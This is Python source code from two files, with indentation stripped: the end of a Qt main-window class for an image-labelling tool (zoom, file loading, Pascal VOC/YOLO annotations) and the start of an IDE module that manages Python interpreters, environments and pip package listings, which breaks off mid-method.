self.actions.editMode.setEnabled(True)
self.setDirty()
if text not in self.labelHist:
self.labelHist.append(text)
else:
# self.canvas.undoLastLine()
self.canvas.resetAllLines()
def scrollRequest(self, delta, orientation):
units = - delta / (8 * 15)
bar = self.scrollBars[orientation]
bar.setValue(bar.value() + bar.singleStep() * units)
def setZoom(self, value):
self.actions.fitWidth.setChecked(False)
self.actions.fitWindow.setChecked(False)
self.zoomMode = self.MANUAL_ZOOM
self.zoomWidget.setValue(value)
def addZoom(self, increment=10):
self.setZoom(self.zoomWidget.value() + increment)
def zoomRequest(self, delta):
# get the current scrollbar positions
# calculate the percentages ~ coordinates
h_bar = self.scrollBars[Qt.Horizontal]
v_bar = self.scrollBars[Qt.Vertical]
# get the current maximum, to know the difference after zooming
h_bar_max = h_bar.maximum()
v_bar_max = v_bar.maximum()
# get the cursor position and canvas size
# calculate the desired movement from 0 to 1
# where 0 = move left
# 1 = move right
# up and down analogous
cursor = QCursor()
pos = cursor.pos()
relative_pos = QWidget.mapFromGlobal(self, pos)
cursor_x = relative_pos.x()
cursor_y = relative_pos.y()
w = self.scrollArea.width()
h = self.scrollArea.height()
# the scaling from 0 to 1 has some padding
# you don't have to hit the very leftmost pixel for a maximum-left movement
margin = 0.1
move_x = (cursor_x - margin * w) / (w - 2 * margin * w)
move_y = (cursor_y - margin * h) / (h - 2 * margin * h)
# clamp the values from 0 to 1
move_x = min(max(move_x, 0), 1)
move_y = min(max(move_y, 0), 1)
# zoom in
units = delta / (8 * 15)
scale = 10
self.addZoom(scale * units)
# get the difference in scrollbar values
# this is how far we can move
d_h_bar_max = h_bar.maximum() - h_bar_max
d_v_bar_max = v_bar.maximum() - v_bar_max
# get the new scrollbar values
new_h_bar_value = h_bar.value() + move_x * d_h_bar_max
new_v_bar_value = v_bar.value() + move_y * d_v_bar_max
h_bar.setValue(new_h_bar_value)
v_bar.setValue(new_v_bar_value)
def setFitWindow(self, value=True):
if value:
self.actions.fitWidth.setChecked(False)
self.zoomMode = self.FIT_WINDOW if value else self.MANUAL_ZOOM
self.adjustScale()
def setFitWidth(self, value=True):
if value:
self.actions.fitWindow.setChecked(False)
self.zoomMode = self.FIT_WIDTH if value else self.MANUAL_ZOOM
self.adjustScale()
def togglePolygons(self, value):
for item, shape in self.itemsToShapes.items():
item.setCheckState(Qt.Checked if value else Qt.Unchecked)
def loadFile(self, filePath=None):
"""Load the specified file, or the last opened file if None."""
self.resetState()
self.canvas.setEnabled(False)
if filePath is None:
filePath = self.settings.get(SETTING_FILENAME)
# Make sure that filePath is a regular python string, rather than QString
filePath = ustr(filePath)
unicodeFilePath = ustr(filePath)
# Tzutalin 20160906 : Add file list and dock to move faster
# Highlight the file item
if unicodeFilePath and self.fileListWidget.count() > 0:
index = self.mImgList.index(unicodeFilePath)
fileWidgetItem = self.fileListWidget.item(index)
fileWidgetItem.setSelected(True)
if unicodeFilePath and os.path.exists(unicodeFilePath):
if LabelFile.isLabelFile(unicodeFilePath):
try:
self.labelFile = LabelFile(unicodeFilePath)
except LabelFileError as e:
self.errorMessage(u'Error opening file',
(u"<p><b>%s</b></p>"
u"<p>Make sure <i>%s</i> is a valid label file.")
% (e, unicodeFilePath))
self.status("Error reading %s" % unicodeFilePath)
return False
self.imageData = self.labelFile.imageData
self.lineColor = QColor(*self.labelFile.lineColor)
self.fillColor = QColor(*self.labelFile.fillColor)
self.canvas.verified = self.labelFile.verified
else:
# Load image:
# read data first and store for saving into label file.
self.imageData = read(unicodeFilePath, None)
self.labelFile = None
self.canvas.verified = False
image = QImage.fromData(self.imageData)
if image.isNull():
self.errorMessage(u'Error opening file',
u"<p>Make sure <i>%s</i> is a valid image file." % unicodeFilePath)
self.status("Error reading %s" % unicodeFilePath)
return False
self.status("Loaded %s" % os.path.basename(unicodeFilePath))
self.image = image
self.filePath = unicodeFilePath
self.canvas.loadPixmap(QPixmap.fromImage(image))
if self.labelFile:
self.loadLabels(self.labelFile.shapes)
self.setClean()
self.canvas.setEnabled(True)
self.adjustScale(initial=True)
self.paintCanvas()
self.addRecentFile(self.filePath)
self.toggleActions(True)
# Label xml file and show bound box according to its filename
# if self.usingPascalVocFormat is True:
if self.defaultSaveDir is not None:
basename = os.path.basename(
os.path.splitext(self.filePath)[0])
xmlPath = os.path.join(self.defaultSaveDir, basename + XML_EXT)
txtPath = os.path.join(self.defaultSaveDir, basename + TXT_EXT)
"""Annotation file priority:
PascalXML > YOLO
"""
if os.path.isfile(xmlPath):
self.loadPascalXMLByFilename(xmlPath)
elif os.path.isfile(txtPath):
self.loadYOLOTXTByFilename(txtPath)
else:
xmlPath = os.path.splitext(filePath)[0] + XML_EXT
txtPath = os.path.splitext(filePath)[0] + TXT_EXT
if os.path.isfile(xmlPath):
self.loadPascalXMLByFilename(xmlPath)
elif os.path.isfile(txtPath):
self.loadYOLOTXTByFilename(txtPath)
self.setWindowTitle(__appname__ + ' ' + filePath)
# Default : select last item if there is at least one item
if self.labelList.count():
self.labelList.setCurrentItem(self.labelList.item(self.labelList.count()-1))
self.labelList.item(self.labelList.count()-1).setSelected(True)
self.canvas.setFocus(True)
return True
return False
def resizeEvent(self, event):
if self.canvas and not self.image.isNull()\
and self.zoomMode != self.MANUAL_ZOOM:
self.adjustScale()
super(MainWindow, self).resizeEvent(event)
def paintCanvas(self):
assert not self.image.isNull(), "cannot paint null image"
self.canvas.scale = 0.01 * self.zoomWidget.value()
self.canvas.adjustSize()
self.canvas.update()
def adjustScale(self, initial=False):
value = self.scalers[self.FIT_WINDOW if initial else self.zoomMode]()
self.zoomWidget.setValue(int(100 * value))
def scaleFitWindow(self):
"""Figure out the size of the pixmap in order to fit the main widget."""
e = 2.0 # So that no scrollbars are generated.
w1 = self.centralWidget().width() - e
h1 = self.centralWidget().height() - e
a1 = w1 / h1
# Calculate a new scale value based on the pixmap's aspect ratio.
w2 = self.canvas.pixmap.width() - 0.0
h2 = self.canvas.pixmap.height() - 0.0
a2 = w2 / h2
return w1 / w2 if a2 >= a1 else h1 / h2
def scaleFitWidth(self):
# The epsilon does not seem to work too well here.
w = self.centralWidget().width() - 2.0
return w / self.canvas.pixmap.width()
def closeEvent(self, event):
if not self.mayContinue():
event.ignore()
settings = self.settings
# If it loads images from dir, don't load it at the begining
if self.dirname is None:
settings[SETTING_FILENAME] = self.filePath if self.filePath else ''
else:
settings[SETTING_FILENAME] = ''
settings[SETTING_WIN_SIZE] = self.size()
settings[SETTING_WIN_POSE] = self.pos()
settings[SETTING_WIN_STATE] = self.saveState()
settings[SETTING_LINE_COLOR] = self.lineColor
settings[SETTING_FILL_COLOR] = self.fillColor
settings[SETTING_RECENT_FILES] = self.recentFiles
settings[SETTING_ADVANCE_MODE] = not self._beginner
if self.defaultSaveDir and os.path.exists(self.defaultSaveDir):
settings[SETTING_SAVE_DIR] = ustr(self.defaultSaveDir)
else:
settings[SETTING_SAVE_DIR] = ""
if self.lastOpenDir and os.path.exists(self.lastOpenDir):
settings[SETTING_LAST_OPEN_DIR] = self.lastOpenDir
else:
settings[SETTING_LAST_OPEN_DIR] = ""
settings[SETTING_AUTO_SAVE] = self.autoSaving.isChecked()
settings[SETTING_SINGLE_CLASS] = self.singleClassMode.isChecked()
settings[SETTING_PAINT_LABEL] = self.paintLabelsOption.isChecked()
settings.save()
## User Dialogs ##
def loadRecent(self, filename):
if self.mayContinue():
self.loadFile(filename)
def scanAllImages(self, folderPath):
extensions = ['.%s' % fmt.data().decode("ascii").lower() for fmt in QImageReader.supportedImageFormats()]
images = []
for root, dirs, files in os.walk(folderPath):
for file in files:
if file.lower().endswith(tuple(extensions)):
relativePath = os.path.join(root, file)
path = ustr(os.path.abspath(relativePath))
images.append(path)
images.sort(key=lambda x: x.lower())
return images
def changeSavedirDialog(self, _value=False):
if self.defaultSaveDir is not None:
path = ustr(self.defaultSaveDir)
else:
path = '.'
dirpath = ustr(QFileDialog.getExistingDirectory(self,
'%s - Save annotations to the directory' % __appname__, path, QFileDialog.ShowDirsOnly
| QFileDialog.DontResolveSymlinks))
if dirpath is not None and len(dirpath) > 1:
self.defaultSaveDir = dirpath
self.statusBar().showMessage('%s . Annotation will be saved to %s' %
('Change saved folder', self.defaultSaveDir))
self.statusBar().show()
def openAnnotationDialog(self, _value=False):
if self.filePath is None:
self.statusBar().showMessage('Please select image first')
self.statusBar().show()
return
path = os.path.dirname(ustr(self.filePath))\
if self.filePath else '.'
if self.usingPascalVocFormat:
filters = "Open Annotation XML file (%s)" % ' '.join(['*.xml'])
filename = ustr(QFileDialog.getOpenFileName(self,'%s - Choose a xml file' % __appname__, path, filters))
if filename:
if isinstance(filename, (tuple, list)):
filename = filename[0]
self.loadPascalXMLByFilename(filename)
def openDirDialog(self, _value=False, dirpath=None):
if not self.mayContinue():
return
defaultOpenDirPath = dirpath if dirpath else '.'
if self.lastOpenDir and os.path.exists(self.lastOpenDir):
defaultOpenDirPath = self.lastOpenDir
else:
defaultOpenDirPath = os.path.dirname(self.filePath) if self.filePath else '.'
targetDirPath = ustr(QFileDialog.getExistingDirectory(self,
'%s - Open Directory' % __appname__, defaultOpenDirPath,
QFileDialog.ShowDirsOnly | QFileDialog.DontResolveSymlinks))
self.importDirImages(targetDirPath)
def importDirImages(self, dirpath):
if not self.mayContinue() or not dirpath:
return
self.lastOpenDir = dirpath
self.dirname = dirpath
self.filePath = None
self.fileListWidget.clear()
self.mImgList = self.scanAllImages(dirpath)
self.openNextImg()
for imgPath in self.mImgList:
item = QListWidgetItem(imgPath)
self.fileListWidget.addItem(item)
self.classListWidget.clear()
for imgPath in self.labelHist:
a=self.labelHist.index(imgPath)
b=str(a)
b = b +": "
item = QListWidgetItem(b+imgPath)
self.classListWidget.addItem(item)
def verifyImg(self, _value=False):
# Proceding next image without dialog if having any label
if self.filePath is not None:
try:
self.labelFile.toggleVerify()
except AttributeError:
# If the labelling file does not exist yet, create if and
# re-save it with the verified attribute.
self.saveFile()
if self.labelFile != None:
self.labelFile.toggleVerify()
else:
return
self.canvas.verified = self.labelFile.verified
self.paintCanvas()
self.saveFile()
def openPrevImg(self, _value=False):
# Proceding prev image without dialog if having any label
if self.autoSaving.isChecked():
if self.defaultSaveDir is not None:
if self.dirty is True:
self.saveFile()
else:
self.changeSavedirDialog()
return
if not self.mayContinue():
return
if len(self.mImgList) <= 0:
return
if self.filePath is None:
return
currIndex = self.mImgList.index(self.filePath)
if currIndex - 1 >= 0:
filename = self.mImgList[currIndex - 1]
if filename:
self.loadFile(filename)
def openNextImg(self, _value=False):
# Proceding prev image without dialog if having any label
if self.autoSaving.isChecked():
if self.defaultSaveDir is not None:
if self.dirty is True:
self.saveFile()
else:
self.changeSavedirDialog()
return
if not self.mayContinue():
return
if len(self.mImgList) <= 0:
return
filename = None
if self.filePath is None:
filename = self.mImgList[0]
else:
currIndex = self.mImgList.index(self.filePath)
if currIndex + 1 < len(self.mImgList):
filename = self.mImgList[currIndex + 1]
if filename:
self.loadFile(filename)
self.yoloConfRefresh()
def nextBox(self):
if (self.labelList.count()):
current = -1
for i in range(self.labelList.count()):
if (self.labelList.item(i).isSelected()):
break
current = i
if ((current != -1) and (current < (self.labelList.count() - 1))):
self.labelList.setCurrentItem(self.labelList.item(current + 1))
self.labelList.item(current + 1).setSelected(True)
else:
self.labelList.setCurrentItem(self.labelList.item(0))
self.labelList.item(0).setSelected(True)
self.labelSelectionChanged()
def backBox(self):
if (self.labelList.count()):
current = -1
for i in range(self.labelList.count()):
if (self.labelList.item(i).isSelected()):
break
current = i
if ((current != -1) and (current > 0)):
self.labelList.setCurrentItem(self.labelList.item(current - 1))
self.labelList.item(current - 1).setSelected(True)
else:
self.labelList.setCurrentItem(self.labelList.item(self.labelList.count() - 1))
self.labelList.item(self.labelList.count() - 1).setSelected(True)
self.labelSelectionChanged()
def openFile(self, _value=False):
if not self.mayContinue():
return
path = os.path.dirname(ustr(self.filePath)) if self.filePath else '.'
formats = ['*.%s' % fmt.data().decode("ascii").lower() for fmt in QImageReader.supportedImageFormats()]
filters = "Image & Label files (%s)" % ' '.join(formats + ['*%s' % LabelFile.suffix])
filename = QFileDialog.getOpenFileName(self, '%s - Choose Image or Label file' % __appname__, path, filters)
if filename:
if isinstance(filename, (tuple, list)):
filename = filename[0]
self.loadFile(filename)
def saveFile(self, _value=False):
if self.defaultSaveDir is not None and len(ustr(self.defaultSaveDir)):
if self.filePath:
imgFileName = os.path.basename(self.filePath)
savedFileName = os.path.splitext(imgFileName)[0]
savedPath = os.path.join(ustr(self.defaultSaveDir), savedFileName)
self._saveFile(savedPath)
else:
imgFileDir = os.path.dirname(self.filePath)
imgFileName = os.path.basename(self.filePath)
savedFileName = os.path.splitext(imgFileName)[0]
savedPath = os.path.join(imgFileDir, savedFileName)
self._saveFile(savedPath if self.labelFile
else self.saveFileDialog())
def saveFileAs(self, _value=False):
assert not self.image.isNull(), "cannot save empty image"
self._saveFile(self.saveFileDialog())
def saveFileDialog(self):
caption = '%s - Choose File' % __appname__
filters = 'File (*%s)' % LabelFile.suffix
openDialogPath = self.currentPath()
dlg = QFileDialog(self, caption, openDialogPath, filters)
dlg.setDefaultSuffix(LabelFile.suffix[1:])
dlg.setAcceptMode(QFileDialog.AcceptSave)
filenameWithoutExtension = os.path.splitext(self.filePath)[0]
dlg.selectFile(filenameWithoutExtension)
dlg.setOption(QFileDialog.DontUseNativeDialog, False)
if dlg.exec_():
fullFilePath = ustr(dlg.selectedFiles()[0])
return os.path.splitext(fullFilePath)[0] # Return file path without the extension.
return ''
def _saveFile(self, annotationFilePath):
if annotationFilePath and self.saveLabels(annotationFilePath):
self.setClean()
self.statusBar().showMessage('Saved to %s' % annotationFilePath)
self.statusBar().show()
def closeFile(self, _value=False):
if not self.mayContinue():
return
self.resetState()
self.setClean()
self.toggleActions(False)
self.canvas.setEnabled(False)
self.actions.saveAs.setEnabled(False)
def resetAll(self):
self.settings.reset()
self.close()
proc = QProcess()
proc.startDetached(os.path.abspath(__file__))
def mayContinue(self):
return not (self.dirty and not self.discardChangesDialog())
def discardChangesDialog(self):
yes, no = QMessageBox.Yes, QMessageBox.No
msg = u'You have unsaved changes, proceed anyway?'
return yes == QMessageBox.warning(self, u'Attention', msg, yes | no)
def errorMessage(self, title, message):
return QMessageBox.critical(self, title,
'<p><b>%s</b></p>%s' % (title, message))
def currentPath(self):
return os.path.dirname(self.filePath) if self.filePath else '.'
def chooseColor1(self):
color = self.colorDialog.getColor(self.lineColor, u'Choose line color',
default=DEFAULT_LINE_COLOR)
if color:
self.lineColor = color
Shape.line_color = color
self.canvas.setDrawingColor(color)
self.canvas.update()
self.setDirty()
def deleteSelectedShape(self):
self.remLabel(self.canvas.deleteSelected())
self.setDirty()
if self.noShapes():
for action in self.actions.onShapesPresent:
action.setEnabled(False)
def chshapeLineColor(self):
color = self.colorDialog.getColor(self.lineColor, u'Choose line color',
default=DEFAULT_LINE_COLOR)
if color:
self.canvas.selectedShape.line_color = color
self.canvas.update()
self.setDirty()
def chshapeFillColor(self):
color = self.colorDialog.getColor(self.fillColor, u'Choose fill color',
default=DEFAULT_FILL_COLOR)
if color:
self.canvas.selectedShape.fill_color = color
self.canvas.update()
self.setDirty()
def copyShape(self):
self.canvas.endMove(copy=True)
self.addLabel(self.canvas.selectedShape)
self.setDirty()
def moveShape(self):
self.canvas.endMove(copy=False)
self.setDirty()
def loadPredefinedClasses(self, predefClassesFile):
if os.path.exists(predefClassesFile) is True:
with codecs.open(predefClassesFile, 'r', 'utf8') as f:
for line in f:
line = line.strip()
if self.labelHist is None:
self.labelHist = [line]
else:
self.labelHist.append(line)
def loadPascalXMLByFilename(self, xmlPath):
if self.filePath is None:
return
if os.path.isfile(xmlPath) is False:
return
self.set_format(FORMAT_PASCALVOC)
tVocParseReader = PascalVocReader(xmlPath)
shapes = tVocParseReader.getShapes()
self.loadLabels(shapes)
self.canvas.verified = tVocParseReader.verified
def loadYOLOTXTByFilename(self, txtPath):
if self.filePath is None:
return
if os.path.isfile(txtPath) is False:
return
self.set_format(FORMAT_YOLO)
tYoloParseReader = YoloReader(txtPath, self.image)
shapes = tYoloParseReader.getShapes()
print (shapes)
self.loadLabels(shapes)
self.canvas.verified = tYoloParseReader.verified
def togglePaintLabelsOption(self):
paintLabelsOptionChecked = self.paintLabelsOption.isChecked()
for shape in self.canvas.shapes:
shape.paintLabel = paintLabelsOptionChecked
def inverted(color):
return QColor(*[255 - v for v in color.getRgb()])
def read(filename, default=None):
try:
with open(filename, 'rb') as f:
return f.read()
except:
return default
def get_main_app(argv=[]):
"""
Standard boilerplate Qt application code.
Do everything but app.exec_() -- so that we can test the application in one thread
"""
app = QApplication(argv)
app.setApplicationName(__appname__)
app.setWindowIcon(newIcon("app"))
# Tzutalin 201705+: Accept extra agruments to change predefined class file
# Usage : labelImg.py image predefClassFile saveDir
win = MainWindow(argv[1] if len(argv) >= 2 else None,
argv[2] if len(argv) >= 3 else os.path.join(
os.path.dirname(sys.argv[0]),
'data', 'predefined_classes.txt'),
argv[3] if len(argv) >= 4 else None)
win.show()
return app, win
def main():
'''construct main app and run it'''
app, _win = get_main_app(sys.argv)
return app.exec_()
if __name__ == '__main__':
sys.exit(main())
|
interpreter.py | # -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
# Name: Interpreter.py
# Purpose:
#
# Author: wukan
#
# Created: 2019-01-10
# Copyright: (c) wukan 2019
# Licence: GPL-3.0
#-------------------------------------------------------------------------------
from noval import GetApp
import os
import locale
import noval.util.apputils as apputils
import noval.util.strutils as strutils
import six.moves.builtins as builtins
import threading
from noval.util import utils
import glob
import sys
try:
import cStringIO
except:
import io as cStringIO
import py_compile
import noval.util.fileutils as fileutils
from noval.executable import Executable,UNKNOWN_VERSION_NAME
#this class should inherit from object class
#otherwise the property definition will not valid
class PythonEnvironment(object):
def __init__(self):
self._include_system_environ = True
self.environ = {}
def Exist(self,key):
return key in self.environ
def GetEnviron(self):
environ = {}
environ.update(self.environ)
if self._include_system_environ:
environ.update(os.environ)
return environ
def SetEnviron(self,dct):
self.environ = {}
for key in dct:
self.environ[str(key)] = str(dct[key])
#must use this environment variable to unbuffered binary stdout and stderr
#environment value must be a string,not a digit,which linux os does not support a digit value
self.environ['PYTHONUNBUFFERED'] = '1'
@property
def IncludeSystemEnviron(self):
return self._include_system_environ
@IncludeSystemEnviron.setter
def IncludeSystemEnviron(self,v):
self._include_system_environ = v
def __next__(self):
'''
python3迭代方法
'''
return self.next()
def __iter__(self):
self.iter = iter(self.environ)
return self
def next(self):
'''
python2迭代方法
'''
return builtins.next(self.iter)
def GetCount(self):
return len(self.environ)
def __getitem__(self,name):
return self.environ[name]
class PythonPackage():
def __init__(self,**kwargs):
for arg in kwargs:
attr = arg
if arg == 'name':
arg = 'Name'
elif arg == 'version':
arg = 'Version'
setattr(self,arg,kwargs[attr])
class BuiltinPythonInterpreter(Executable):
def __init__(self,name,executable_path,id=None,is_builtin = True):
super(BuiltinPythonInterpreter,self).__init__(name,executable_path)
self._is_builtin = is_builtin
if id is None:
self._id = GetApp().GetInterpreterManager().GenerateId()
else:
self._id = int(id)
self._is_default = False
self._sys_path_list = sys.path
self._python_path_list = []
#python完整版本号
self._version = ".".join([str(sys.version_info.major),str(sys.version_info.minor),str(sys.version_info.micro)])
#python精简版本号,只包含major和minor
self._minor_version = ".".join([str(sys.version_info.major),str(sys.version_info.minor)])
self._builtins = list(sys.builtin_module_names)
self.Environ = PythonEnvironment()
self._packages = {}
self._help_path = ""
#builtin module name which python2 is __builtin__ and python3 is builtins
self._builtin_module_name = builtins.__name__
@property
def IsBuiltIn(self):
return self._is_builtin
@property
def MinorVersion(self):
return self._minor_version
@property
def Version(self):
return self._version
@property
def HelpPath(self):
return self._help_path
@HelpPath.setter
def HelpPath(self,help_path):
self._help_path = help_path
@property
def Default(self):
return self._is_default
@Default.setter
def Default(self,is_default):
self._is_default = is_default
@property
def SysPathList(self):
return self._sys_path_list
@property
def PythonPathList(self):
return self._python_path_list
@PythonPathList.setter
def PythonPathList(self,path_list):
self._python_path_list = path_list
@property
def Builtins(self):
return self._builtins
@property
def Id(self):
return self._id
@property
def BuiltinModuleName(self):
return self._builtin_module_name
@property
def Packages(self):
return self._packages
@Packages.setter
def Packages(self,packages):
self._packages = packages
def LoadPackages(self,ui_panel,force):
ui_panel.LoadPackageEnd(self)
@property
def IsLoadingPackage(self):
return False
def SetInterpreter(self,**kwargs):
self._version = kwargs.get('version')
if self._version == UNKNOWN_VERSION_NAME:
return
self._minor_version = kwargs.get('minor_version','')
self._builtins = kwargs.get('builtins')
self._sys_path_list = kwargs.get('sys_path_list')
python_path_list = kwargs.get('python_path_list')
self._python_path_list = [pythonpath for pythonpath in python_path_list if str(pythonpath) != '']
self._is_builtin = kwargs.get('is_builtin')
def IsV2(self):
return True
def IsV3(self):
return False
@property
def Analysing(self):
return False
@property
def IsValidInterpreter(self):
return True
def CheckSyntax(self,script_path):
origin_stderr = sys.stderr
sys.stderr = cStringIO.StringIO()
py_compile.compile(script_path)
output = sys.stderr.getvalue().strip()
sys.stderr = origin_stderr
if 0 == len(output):
return True,-1,''
lower_output = output.lower()
lines = output.splitlines()
fileBegin = lines[0].find("File \"")
fileEnd = lines[0].find("\", line ")
if -1 != lower_output.find('permission denied:'):
line = lines[-1]
pos = line.find(']')
msg = line[pos+1:].replace("'","").strip()
msg += ",Perhaps you need to delete it first!"
return False,-1,msg
elif fileBegin != -1 and fileEnd != -1:
lineNum = int(lines[0][fileEnd + 8:].strip())
return False,lineNum,'\n'.join(lines[1:])
i = lines[0].find('(')
j = lines[0].find(')')
msg = lines[0][0:i].strip()
lineNum = int(lines[0][i+1:j].split()[-1])
return False,lineNum,msg
def IsPackageExist(self,package_name):
if package_name in self.Packages:
return True
return False
def LoaPackagesFromDict(self,package_dct):
return {}
def DumpPackages(self):
return {}
def GetExedirs(self):
return [self.InstallPath,]
def IsVirtual(self):
return False
def GetPythonLibPath(self):
return None
class PythonInterpreter(BuiltinPythonInterpreter):
CONSOLE_EXECUTABLE_NAME = "python.exe"
WINDOW_EXECUTABLE_NAME = "pythonw.exe"
def __init__(self,name,executable_path,id=None,is_valid_interpreter = False):
if apputils.is_windows():
if os.path.basename(executable_path) == PythonInterpreter.WINDOW_EXECUTABLE_NAME:
self._window_path = executable_path
console_path = os.path.join(os.path.dirname(executable_path),PythonInterpreter.CONSOLE_EXECUTABLE_NAME)
self._console_path = console_path
executable_path = self._console_path
elif os.path.basename(executable_path) == PythonInterpreter.CONSOLE_EXECUTABLE_NAME:
self._console_path = executable_path
window_path = os.path.join(os.path.dirname(executable_path),PythonInterpreter.WINDOW_EXECUTABLE_NAME)
self._window_path = window_path
super(PythonInterpreter,self).__init__(name,executable_path,id,False)
self._is_valid_interpreter = is_valid_interpreter
self._version = UNKNOWN_VERSION_NAME
self._is_analysing = False
self._is_analysed = False
self._is_loading_package = False
#python精简版本号,只包含major和minor
self._minor_version = ''
if not is_valid_interpreter:
#获取python的完整版本号
self.GetVersion()
#获取python的精简版本号
self.GetMinorVersion()
if not is_valid_interpreter and self._is_valid_interpreter:
self.GetSysPathList()
self.GetBuiltins()
def IsVirtual(self):
'''
是否虚拟解释器
'''
pdir = os.path.dirname(self.Path)
return (
os.path.exists(os.path.join(pdir, "activate"))
or os.path.exists(os.path.join(pdir, "activate.bat"))
)
def GetMinorVersion(self):
if not self._minor_version:
cmd ="\"%s\" -c \"import sys;print(str(sys.version_info.major) + '.' + str(sys.version_info.minor))\"" % self.Path
output = utils.GetCommandOutput(cmd)
self._minor_version = output.strip()
def GetVersion(self):
output = utils.GetCommandOutput("%s -V" % strutils.emphasis_path(self.Path),True).strip().lower()
version_flag = "python "
if output.find(version_flag) == -1:
output = utils.GetCommandOutput("%s -V" % strutils.emphasis_path(self.Path),False).strip().lower()
if output.find(version_flag) == -1:
utils.get_logger().error("get version stdout output is *****%s****",output)
return
self._version = output.replace(version_flag,"").strip()
#anaconda安装的python版本号是Python 3.6.5 :: Anaconda, Inc.需要从中获取正确的版本号
if self._version.find(':') != -1:
self._version = self._version[0:self._version.find(':')].strip()
self._is_valid_interpreter = True
self.SetBuiltinName()
def IsV27(self):
versions = self.Version.split('.')
if int(versions[0]) == 2 and int(versions[1]) == 7:
return True
return False
def IsV26(self):
versions = self.Version.split('.')
if int(versions[0]) == 2 and int(versions[1]) == 6:
return True
return False
def IsV2(self):
versions = self.Version.split('.')
if not versions[0].isdigit():
return False
if int(versions[0]) == 2:
return True
return False
def IsV3(self):
versions = self.Version.split('.')
if not versions[0].isdigit():
return False
if int(versions[0]) >= 3:
return True
return False
def CheckSyntax(self,script_path):
check_cmd ="\"%s\" -c \"import py_compile;py_compile.compile(r'%s')\"" % (self.Path,script_path)
if utils.is_py2():
sys_encoding = locale.getdefaultlocale()[1]
check_cmd = check_cmd.encode(sys_encoding)
output = utils.GetCommandOutput(check_cmd,True).strip()
if 0 == len(output):
return True,-1,''
lower_output = output.lower()
lines = output.splitlines()
fileBegin = lines[0].find("File \"")
fileEnd = lines[0].find("\", line ")
if -1 != lower_output.find('permission denied:'):
line = lines[-1]
pos = line.find(']')
msg = line[pos+1:].replace("'","").strip()
msg += ",Perhaps you need to delete it first!"
return False,-1,msg
elif fileBegin != -1 and fileEnd != -1:
lineNum = int(lines[0][fileEnd + 8:].strip())
return False,lineNum,'\n'.join(lines[1:])
if self.IsV26():
'''
parse such error text:
Sorry: IndentationError: ('unexpected indent', ('D:\\env\\Noval\\noval\\test\\run_test_input.py', 106, 16, ' ddd\n'))
'''
i = lines[0].find(", ('")
j = lines[0].find(')')
msg = lines[0][0:i].strip()
lineNum = int(lines[0][i+1:j].split(',')[1].strip())
else:
'''
parse such error text:
Sorry: IndentationError: unexpected indent (run_test_input.py, line 106)
'''
i = lines[0].find('(')
j = lines[0].find(')')
msg = lines[0][0:i].strip()
lineNum = int(lines[0][i+1:j].split()[-1])
return False,lineNum,msg
@property
def ConsolePath(self):
return self._console_path
@property
def WindowPath(self):
return self._window_path
@property
def IsValidInterpreter(self):
return self._is_valid_interpreter
def GetSysPathList(self):
if self.IsV2():
run_cmd ="%s -c \"import sys;print sys.path\"" % (strutils.emphasis_path(self.Path))
elif self.IsV3():
run_cmd ="%s -c \"import sys;print (sys.path)\"" % (strutils.emphasis_path(self.Path))
else:
utils.get_logger().warn("interpreter path %s could not get python version" % self.Path)
self._is_valid_interpreter = False
return
output = utils.GetCommandOutput(run_cmd).strip()
lst = eval(output)
self._sys_path_list = lst
def GetBuiltins(self):
if not self._is_valid_interpreter :
return
if self.IsV2():
run_cmd ="%s -c \"import sys;print sys.builtin_module_names\"" % (strutils.emphasis_path(self.Path))
elif self.IsV3():
run_cmd ="%s -c \"import sys;print (sys.builtin_module_names)\"" % (strutils.emphasis_path(self.Path))
output = utils.GetCommandOutput(run_cmd).strip()
lst = eval(output)
#should convert tuple type to list
self._builtins = list(lst)
def GetPythonLibPath(self):
'''
获取解释器全局安装安装时的路径
'''
if self.IsV2():
cmd = "%s -c \"from distutils.sysconfig import get_python_lib; print get_python_lib()\"" % \
(strutils.emphasis_path(self.Path),)
elif self.IsV3():
cmd = "%s -c \"from distutils.sysconfig import get_python_lib; print (get_python_lib())\"" % \
(strutils.emphasis_path(self.Path),)
python_lib_path = utils.GetCommandOutput(cmd).strip()
return python_lib_path
def GetUserLibPath(self):
'''
获取解释器安装包时--user参数时的HOME路径
'''
command = "%s -c \"import site;print(site.getusersitepackages())\"" %(strutils.emphasis_path(self.Path))
user_lib_path = utils.GetCommandOutput(command).strip()
return user_lib_path
@property
def Analysing(self):
return self._is_analysing
@Analysing.setter
def Analysing(self,is_analysing):
self._is_analysing = is_analysing
@property
def IsAnalysed(self):
return self._is_analysed
@IsAnalysed.setter
def IsAnalysed(self,is_analysed):
self._is_analysed = is_analysed
def GetPipPath(self):
if apputils.is_windows():
pip_name = "pip.exe"
pip3_name = "pip3.exe"
else:
pip_name = "pip"
pip3_name = "pip3"
python_location = os.path.dirname(self.Path)
pip_path_list = []
#linux python3 pip tool name is pip3
if self.IsV2() or apputils.is_windows():
pip_path_list = [os.path.join(python_location,"Scripts",pip_name),os.path.join(python_location,pip_name)]
if self.IsV3():
#py3 may get pip3 as the pip tool
pip_path_list.extend([os.path.join(python_location,"Scripts",pip3_name),os.path.join(python_location,pip3_name)])
for pip_path in pip_path_list:
if os.path.exists(pip_path):
return pip_path
return None
def GetDocPath(self):
if self._help_path == "":
if apputils.is_windows():
python_location = os.path.dirname(self.Path)
doc_location = os.path.join(python_location,"Doc")
file_list = glob.glob(os.path.join(doc_location,"*.chm"))
if len(file_list) > 0 :
self._help_path = file_list[0]
def LoadPackages(self,ui_panel,force):
if (not self._is_loading_package and 0 == len(self._packages)) or force:
t = threading.Thread(target=self.LoadPackageList,args=(ui_panel,))
t.start()
def LoadPackageList(self,ui_panel):
#clear all packages first
self._packages = {}
self._is_loading_package = True
pip_path = self.GetPipPath()
if pip_path is not None:
command = "%s list" % strutils.emphasis_path(pip_path)
output = utils.GetCommandOutput(command)
for line in output.split('\n'):
if line.strip() == "":
continue
name,raw_version = line.split()[0:2]
#filter output lines like
'''
Package Version
---------------------------- ---------
'''
if raw_version.startswith("-----") or raw_version.strip() == "Version":
continue
version = raw_version.replace("(","").replace(")","")
python_package = PythonPackage(**{'Name':name,'Version':version})
self._packages[name] = python_package
if self._is_loading_package:
ui_panel.LoadPackageEnd(self)
self._is_loading_package = False
else:
utils.get_logger().warn("user stop loading interpreter %s package....." % self.Name)
@property
def IsLoadingPackage(self):
return self._is_loading_package
def StopLoadingPackage(self):
self._is_loading_package = False
def GetInstallPackage(self,package_name):
command = "%s show %s" % (strutils.emphasis_path(self.GetPipPath()),package_name)
